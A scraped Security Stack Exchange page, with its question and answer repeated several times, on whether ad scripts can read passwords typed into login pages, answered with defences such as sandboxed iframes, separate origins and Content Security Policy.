…down the primrose path

The meaning of "scale" in "because diversions scale so easily wealth becomes concentrated"

Getting an entry level IT position later in life

Why is Chromosome 1 called Chromosome 1?

Does a 4 bladed prop have almost twice the thrust of a 2 bladed prop?

If someone else uploads my GPL'd code to Github without my permission, is that a copyright violation?

What is the German idiom or expression for when someone is being hypocritical against their own teachings?

I was contacted by a private bank overseas to get my inheritance

What prevents ads from reading my password as I type it?

Not been paid even after reminding the Treasurer; what should I do?

Why did the US Airways Flight 1549 passengers stay on the wings?

Generate a random point outside a given rectangle within a map

Non-small objects in categories

How to call made-up data?

How does LIDAR avoid getting confused in an environment being scanned by hundreds of other LIDAR?

Can you take actions after being healed at 0hp?

How to make attic easier to traverse?

Why am I not getting stuck in the loop

Why does putting a dot after the URL remove login information?

Does the length of a password for Wi-Fi affect speed?

How important is it to have a spot meter on the light meter?

Only charge capacitor when button pushed then turn on LED momentarily with capacitor when button released

If a vampire drinks blood of a sick human, does the vampire get infected?

Can I enter a rental property without giving notice if I'm afraid a tenant may be hurt?

What prevents ads from reading my password as I type it?

Database field type for password storage?What should I do if I type my password in the address bar, or type password in google search?How much information can be obtained from observing someone type their password?After I downloaded Adblock plus on my computer, ads still popped up on youtube? What gives?Hashing request - What type of hash this?Is always using HTTPS a good idea?What's the most effective type of password?System prevents changing password too soon after previous changeProtecting against input type =“password” changes?What's the risk if I accidently type my password into a username field in a website?

.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty margin-bottom:0;

8

0

^{Disclaimer: I have minimal web-dev/security knowledge so please answer with this in mind.}

I've heard that web-advertisements need to be able to run their own JavaScript so that they can verify they're being viewed by "real users." As this incident on StackOverflow shows, they're basically given free reign.

I also know that JavaScript can be used to capture keystrokes on a webpage.

So if an ad is placed on a login page, is there something in place to prevent the ad from reading keystrokes to record my credentials? Is reading keystrokes simply not possible from an ad?

If I see ads on a login page should I assume that the page is not safe to enter my credentials?

passwords web-application

share|improve this question

edited 4 hours ago

scohe001

asked 9 hours ago

scohe001scohe001

16488 bronze badges

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  It's worse than that. Web performance tools and similar not only read your credentials but they read the credentials you type and then delete. Very nasty. You might be able to get away with not typing, always pasting your credentials. But the javascript has access to your DOM so it can just read every element. The only way to stop that is not to use credentials but to use oAuth and hand you life over to Google. What could go wrong.
  
  – Unicorn Tears
  9 hours ago
  

  
  
  
  

add a comment | 

8

0

^{Disclaimer: I have minimal web-dev/security knowledge so please answer with this in mind.}

I've heard that web-advertisements need to be able to run their own JavaScript so that they can verify they're being viewed by "real users." As this incident on StackOverflow shows, they're basically given free reign.

I also know that JavaScript can be used to capture keystrokes on a webpage.

So if an ad is placed on a login page, is there something in place to prevent the ad from reading keystrokes to record my credentials? Is reading keystrokes simply not possible from an ad?

If I see ads on a login page should I assume that the page is not safe to enter my credentials?

passwords web-application

share|improve this question

edited 4 hours ago

scohe001

asked 9 hours ago

scohe001scohe001

16488 bronze badges

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  It's worse than that. Web performance tools and similar not only read your credentials but they read the credentials you type and then delete. Very nasty. You might be able to get away with not typing, always pasting your credentials. But the javascript has access to your DOM so it can just read every element. The only way to stop that is not to use credentials but to use oAuth and hand you life over to Google. What could go wrong.
  
  – Unicorn Tears
  9 hours ago
  

  
  
  
  

add a comment | 

^{Disclaimer: I have minimal web-dev/security knowledge so please answer with this in mind.}

I've heard that web-advertisements need to be able to run their own JavaScript so that they can verify they're being viewed by "real users." As this incident on StackOverflow shows, they're basically given free reign.

I also know that JavaScript can be used to capture keystrokes on a webpage.

So if an ad is placed on a login page, is there something in place to prevent the ad from reading keystrokes to record my credentials? Is reading keystrokes simply not possible from an ad?

If I see ads on a login page should I assume that the page is not safe to enter my credentials?

passwords web-application

share|improve this question

edited 4 hours ago

scohe001

asked 9 hours ago

scohe001scohe001

16488 bronze badges

share|improve this question

edited 4 hours ago

scohe001

asked 9 hours ago

scohe001scohe001

16488 bronze badges

share|improve this question

edited 4 hours ago

scohe001

asked 9 hours ago

scohe001scohe001

16488 bronze badges

asked 9 hours ago

scohe001scohe001

16488 bronze badges

asked 9 hours ago

scohe001scohe001

16488 bronze badges

1 Answer
1

active

oldest

votes

11

Nothing prevents ads to read your passwords.

Ads (or any other script like analytics or JavaScript libraries) have access to the main JavaScript scope, and are able to read a lot of sensitive stuff: financial information, passwords, CSRF tokens, etc.

Well, unless they're being loaded in a sandboxed iframe.

Loading an ad in a sandboxed iframe will add security restrictions to the JavaScript scope it has access to, so it won't be able to do nasty stuff.

Unfortunately, most of the third-party scripts are not sandboxed. This is because some of them require access to the main scope to work properly, so they're almost never sandboxed.

---

As a developer, what can I do?

Since any third-party script could compromise the security of all you personal data, all sensitive pages (like login forms or checkout pages) should be loaded on their own origin (a subdomain is fine).

Using another origin allows us to profit from the Same-Origin Policy.

Note: Content Security Policy and Subresource Integrity could also be used if the third-party can be easily reviewed, but most ad networks couldn't work anymore if you used them.

share|improve this answer

edited 4 hours ago

answered 9 hours ago

Benoit EsnardBenoit Esnard

9,94266 gold badges5151 silver badges5656 bronze badges

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Is there some way a layman like me could tell the difference between a sandbox'ed ad vs. a non-sandbox'ed ad?
  
  – scohe001
  9 hours ago
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @scohe001: Do you know how to use the "Inspect element" tool in your browser? A sandboxed iframe has a "sandbox" attribute. I don't know any easy way to check this without any HTML knowledge unfortunately. :(
  
  – Benoit Esnard
  9 hours ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  @scohe001 This Stylus usersheet will put a super-annoying border around unsandboxed iframes and sandboxed iframes that can run scripts: iframe:not([sandbox]),iframe[sandbox~=allow-scripts]border:10px solid red !important;border-image:repeating-linear-gradient(45deg,red,red 5%,#ff0 5%,#ff0 10%)10 !important;
  
  – AuxTaco
  9 mins ago
  

  
  
  
  

add a comment | 

Your Answer

StackExchange.ready(function()
var channelOptions =
tags: "".split(" "),
id: "162"
;
initTagRenderer("".split(" "), "".split(" "), channelOptions);

StackExchange.using("externalEditor", function()
// Have to fire editor after snippets, if snippets enabled
if (StackExchange.settings.snippets.snippetsEnabled)
StackExchange.using("snippets", function()
createEditor();
);

else
createEditor();

);

function createEditor()
StackExchange.prepareEditor(
heartbeatType: 'answer',
autoActivateHeartbeat: false,
convertImagesToLinks: false,
noModals: true,
showLowRepImageUploadWarning: true,
reputationToPostImages: null,
bindNavPrevention: true,
postfix: "",
imageUploader:
brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
allowUrls: true
,
noCode: true, onDemand: true,
discardSelector: ".discard-answer"
,immediatelyShowMarkdownHelp:true
);



);

draft saved

draft discarded

Sign up or log in

StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);

Sign up using Google

Sign up using Facebook

Sign up using Email and Password

Post as a guest

Name

Email

Required, but never shown

StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f214784%2fwhat-prevents-ads-from-reading-my-password-as-i-type-it%23new-answer', 'question_page');

);

Post as a guest

Name

Email

Required, but never shown

11

Nothing prevents ads to read your passwords.

Ads (or any other script like analytics or JavaScript libraries) have access to the main JavaScript scope, and are able to read a lot of sensitive stuff: financial information, passwords, CSRF tokens, etc.

Well, unless they're being loaded in a sandboxed iframe.

Loading an ad in a sandboxed iframe will add security restrictions to the JavaScript scope it has access to, so it won't be able to do nasty stuff.

Unfortunately, most of the third-party scripts are not sandboxed. This is because some of them require access to the main scope to work properly, so they're almost never sandboxed.

---

As a developer, what can I do?

Since any third-party script could compromise the security of all you personal data, all sensitive pages (like login forms or checkout pages) should be loaded on their own origin (a subdomain is fine).

Using another origin allows us to profit from the Same-Origin Policy.

Note: Content Security Policy and Subresource Integrity could also be used if the third-party can be easily reviewed, but most ad networks couldn't work anymore if you used them.

share|improve this answer

edited 4 hours ago

answered 9 hours ago

Benoit EsnardBenoit Esnard

9,94266 gold badges5151 silver badges5656 bronze badges

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Is there some way a layman like me could tell the difference between a sandbox'ed ad vs. a non-sandbox'ed ad?
  
  – scohe001
  9 hours ago
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @scohe001: Do you know how to use the "Inspect element" tool in your browser? A sandboxed iframe has a "sandbox" attribute. I don't know any easy way to check this without any HTML knowledge unfortunately. :(
  
  – Benoit Esnard
  9 hours ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  @scohe001 This Stylus usersheet will put a super-annoying border around unsandboxed iframes and sandboxed iframes that can run scripts: iframe:not([sandbox]),iframe[sandbox~=allow-scripts]border:10px solid red !important;border-image:repeating-linear-gradient(45deg,red,red 5%,#ff0 5%,#ff0 10%)10 !important;
  
  – AuxTaco
  9 mins ago
  

  
  
  
  

add a comment | 

11

Nothing prevents ads to read your passwords.

Ads (or any other script like analytics or JavaScript libraries) have access to the main JavaScript scope, and are able to read a lot of sensitive stuff: financial information, passwords, CSRF tokens, etc.

Well, unless they're being loaded in a sandboxed iframe.

Loading an ad in a sandboxed iframe will add security restrictions to the JavaScript scope it has access to, so it won't be able to do nasty stuff.

Unfortunately, most of the third-party scripts are not sandboxed. This is because some of them require access to the main scope to work properly, so they're almost never sandboxed.

---

As a developer, what can I do?

Since any third-party script could compromise the security of all you personal data, all sensitive pages (like login forms or checkout pages) should be loaded on their own origin (a subdomain is fine).

Using another origin allows us to profit from the Same-Origin Policy.

Note: Content Security Policy and Subresource Integrity could also be used if the third-party can be easily reviewed, but most ad networks couldn't work anymore if you used them.

share|improve this answer

edited 4 hours ago

answered 9 hours ago

Benoit EsnardBenoit Esnard

9,94266 gold badges5151 silver badges5656 bronze badges

• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  Is there some way a layman like me could tell the difference between a sandbox'ed ad vs. a non-sandbox'ed ad?
  
  – scohe001
  9 hours ago
  

  
  
  
  


• 
  
  
  

  
  1
  

  
  
  
  
  
  

  
  
  @scohe001: Do you know how to use the "Inspect element" tool in your browser? A sandboxed iframe has a "sandbox" attribute. I don't know any easy way to check this without any HTML knowledge unfortunately. :(
  
  – Benoit Esnard
  9 hours ago
  

  
  
  
  


• 
  
  
  

  
  

  
  
  
  
  
  

  
  
  @scohe001 This Stylus usersheet will put a super-annoying border around unsandboxed iframes and sandboxed iframes that can run scripts: iframe:not([sandbox]),iframe[sandbox~=allow-scripts]border:10px solid red !important;border-image:repeating-linear-gradient(45deg,red,red 5%,#ff0 5%,#ff0 10%)10 !important;
  
  – AuxTaco
  9 mins ago
  

  
  
  
  

add a comment | 

Nothing prevents ads to read your passwords.

Ads (or any other script like analytics or JavaScript libraries) have access to the main JavaScript scope, and are able to read a lot of sensitive stuff: financial information, passwords, CSRF tokens, etc.

Well, unless they're being loaded in a sandboxed iframe.

Loading an ad in a sandboxed iframe will add security restrictions to the JavaScript scope it has access to, so it won't be able to do nasty stuff.

Unfortunately, most of the third-party scripts are not sandboxed. This is because some of them require access to the main scope to work properly, so they're almost never sandboxed.

---

As a developer, what can I do?

Since any third-party script could compromise the security of all you personal data, all sensitive pages (like login forms or checkout pages) should be loaded on their own origin (a subdomain is fine).

Using another origin allows us to profit from the Same-Origin Policy.

Note: Content Security Policy and Subresource Integrity could also be used if the third-party can be easily reviewed, but most ad networks couldn't work anymore if you used them.

share|improve this answer

edited 4 hours ago

answered 9 hours ago

Benoit EsnardBenoit Esnard

9,94266 gold badges5151 silver badges5656 bronze badges

share|improve this answer

edited 4 hours ago

answered 9 hours ago

Benoit EsnardBenoit Esnard

9,94266 gold badges5151 silver badges5656 bronze badges

answered 9 hours ago

Benoit EsnardBenoit Esnard

9,94266 gold badges5151 silver badges5656 bronze badges

answered 9 hours ago

Benoit EsnardBenoit Esnard

9,94266 gold badges5151 silver badges5656 bronze badges